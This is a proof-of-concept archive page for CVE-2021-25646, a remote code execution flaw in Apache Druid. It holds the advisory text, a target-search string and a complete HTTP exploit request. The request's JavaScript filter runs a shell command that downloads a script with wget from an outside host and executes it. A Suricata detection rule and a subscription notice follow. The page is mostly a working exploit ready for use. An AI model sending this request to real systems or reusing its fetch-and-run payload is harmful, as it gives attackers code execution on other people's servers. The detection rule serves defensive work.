Associated Vulnerability
Title:Authenticated users can override system configurations in their requests which allows them to execute arbitrary code. (CVE-2021-25646)Description:Apache Druid includes the ability to execute user-provided JavaScript code embedded in various types of requests. This functionality is intended for use in high-trust environments, and is disabled by default. However, in Druid 0.20.0 and earlier, it is possible for an authenticated user to send a specially-crafted request that forces Druid to run user-provided JavaScript code for that request, regardless of server configuration. This can be leveraged to execute code on the target machine with the privileges of the Druid server process.
Readme
# Apache Druid RCE
# title="druid" && title=="Apache Druid"
POST /druid/indexer/v1/sampler?for=filter HTTP/1.1
Host: x.x.x.x:8888
Content-Length: 612
Accept: application/json, text/plain, */*
Origin: http://x.x.x.x:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/json;charset=UTF-8
Referer: http://x.x.x.x:8888/unified-console.html
Accept-Language: zh-CN,zh;q=0.9
Connection: close
{"type":"index","spec":{"ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"quickstart/tutorial/","filter":"wikiticker-2015-09-12-sampled.json.gz"}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"json","timestampSpec":{"column":"time","format":"iso"},"dimensionsSpec":{}}},"transformSpec":{"transforms":[],"filter":{"type":"javascript",
"function":"function(value){return java.lang.Runtime.getRuntime().exec('wget http://x.x.x.x/1.txt -O /tmp/1.sh && sh /tmp/1.sh')}",
"dimension":"added",
"":{
"enabled":"true"
}
}}}},"samplerConfig":{"numRows":500,"cacheKey":"73a90acaae2b1ccc0e969709665bc62f"}}
# Detection rules
alert http any any -> any any (msg:"ET EXPLOIT CVE-2021-25646 Apache Druid RCE POST"; flow:established,to_server; content:"POST"; http_method;content:"/druid/indexer/v1/sampler?for=filter"; http_uri; content:"java.lang.Runtime.getRuntime().exec(";http_client_body; nocase; reference:url,mp.weixin.qq.com/s/Eny6AnFarvvpjeEJNMfTrw; reference:cve,2021-25646; classtype:web-application-attack; sid:2031533; rev:2; metadata:affected_product Web_Server_Applications, created_at 2021_02_03, cve CVE_2021_25646, former_category EXPLOIT, signature_severity Major, updated_at 2021_02_03;)
File Snapshot
[4.0K] /data/pocs/19efbb8417eb2f65f2eb77ea8d38c849b6bead93
└── [1.7K] README.md
0 directories, 1 file
Remarks
1. It is advised to access via the original source first.
2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →